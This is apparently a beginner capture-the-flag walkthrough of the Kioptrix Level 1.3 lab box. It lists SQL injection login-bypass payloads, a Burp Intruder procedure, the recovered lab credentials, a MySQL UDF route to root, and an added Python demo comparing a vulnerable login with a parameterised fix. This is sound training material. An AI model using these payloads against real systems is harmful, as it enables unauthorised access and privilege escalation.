KIOPTRIX: LEVEL 1.3 (#4) Walkthrough
This box is similar to the earlier Kioptrix machines and, like them, is well suited to beginners. As usual, let me start with a quote.
“The opportunity of defeating the enemy is provided by the enemy himself.” — Sun Tzu
Enumeration
Let’s start with enumeration…
sudo nmap -p- -T4 -A 192.168.103.183
Nmap reports the following running services:
- ssh
- http
- smb
More Enumeration…
1. SSH
There is no public exploit for this SSH version. The only weakness worth noting is possible username enumeration.
2. HTTP
Nothing sensitive in the page source and no robots.txt.
- Nikto: reports the server as Apache/2.2.8 with PHP/5.2.4.
- GoBuster
3. SMB
Finding POI (Point Of Intrusion)
From the enumeration, I would say we have a few possible POIs. First, what is not a viable POI:
- SSH: no exploit available; fall back to possible user enumeration only as a last resort.
- SMB: nothing sensitive found here.
- Apache 2.2.8 and PHP 5.2.4: no usable exploits for this set-up.
Therefore the POI has to be the website, with two candidate bug classes:
- LFI / RFI
- SQLi
Since there is a login page, I will test for SQLi first.
Exploitation
I used Burp to test the login form with SQLi payloads.
Payload:
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
Procedure:
1. Catch the login request in Burp.
2. Send it to Intruder and use the Sniper attack type on the password field.
3. Run the attack and analyse the response lengths; the outliers are the payloads that changed the query.
I used the credentials john:'OR'1
and got into the page…
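As an added example (not code from this walkthrough), here is the shape of bug the payload list above is hunting for, and why sorting Intruder results by response length finds it: a login query built by string concatenation next to its parameterised fix, plus a loop that plays the Sniper attack over the page's payload list and records status and response length per request. The table layout, the response bodies and the use of SQLite in place of the target's MySQL are assumptions made for the demo; the two accounts are the ones this walkthrough reports.

```python
import sqlite3

# Added example, not part of the walkthrough. Table layout, page bodies and
# the use of SQLite (instead of the target's MySQL) are constructed for the
# demo; the usernames/passwords are the ones the walkthrough reports.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO members (username, password) VALUES (?, ?)",
        [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Vulnerable: user input is spliced straight into the SQL text."""
    query = (
        "SELECT username FROM members WHERE username='%s' AND password='%s'"
        % (username, password)
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:  # broken syntax -> a distinct error page
        return {"status": "error", "body": "SQL error: %s" % exc}
    if row:
        return {"status": "ok", "body": "Welcome %s, here is your member page" % row[0]}
    return {"status": "denied", "body": "Login failed"}


def safe_login(conn, username, password):
    """Fixed: bound parameters, so the payload can never become SQL syntax."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    if row:
        return {"status": "ok", "body": "Welcome %s, here is your member page" % row[0]}
    return {"status": "denied", "body": "Login failed"}


# The payload list from the walkthrough (backslashes escaped for Python).
PAYLOADS = [
    "'", "''", "`", "``", ",", '"', '""', "/", "//", "\\", "\\\\", ";",
    "' or \"", "-- or #", "' OR '1", "' OR 1 -- -", '" OR "" = "',
    '" OR 1 = 1 -- -', "' OR '' = '", "'='", "'LIKE'", "'=0--+", "OR 1=1",
    "' OR 'x'='x", "' AND id IS NULL; --", "'''''''''''''UNION SELECT '2",
    "%00", "/*…*/",
]


def sniper(login, username, payloads):
    """Intruder 'Sniper' on the password position: one request per payload.
    Returns (payload, status, response length) so the results can be sorted
    by length exactly as in Burp's results table."""
    conn = make_db()
    results = []
    for payload in payloads:
        resp = login(conn, username, payload)
        results.append((payload, resp["status"], len(resp["body"])))
    return results


def bypasses(login, username, payloads):
    """Payloads whose response is the logged-in page (the length outliers)."""
    return [p for p, status, _ in sniper(login, username, payloads) if status == "ok"]


if __name__ == "__main__":
    rows = sorted(sniper(vulnerable_login, "john", PAYLOADS), key=lambda r: r[2])
    for payload, status, length in rows:
        print("%-32r %-7s %d" % (payload, status, length))
    print("bypasses (vulnerable):", bypasses(vulnerable_login, "john", PAYLOADS))
    print("bypasses (parameterised):", bypasses(safe_login, "john", PAYLOADS))
```

Three response classes fall out of the length column: the short "Login failed" page, the longer member page for payloads that rewrote the WHERE clause (`' OR '1`, `' OR 1 -- -`, `' OR 'x'='x`, and the page's own `'OR'1`), and error pages for payloads that merely broke the syntax. Dialects differ: `'='` relies on MySQL comparing the boolean 0 with `''` numerically and does not fire in SQLite, so always run the list against the real backend rather than trusting a local model.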
Let me try the credentials found on that page over SSH…
- robert:ADGAdsafdfwt4gadfga==
- john:MyNameIsJohn
But it is a restricted shell…😩
Privilege Escalation
I found a UDF (User Defined Function) available in MySQL. A UDF that executes system commands is enough to reach root when mysqld itself runs with root privileges, so I followed https://recipeforroot.com/mysql-to-system-root/ to get a root shell.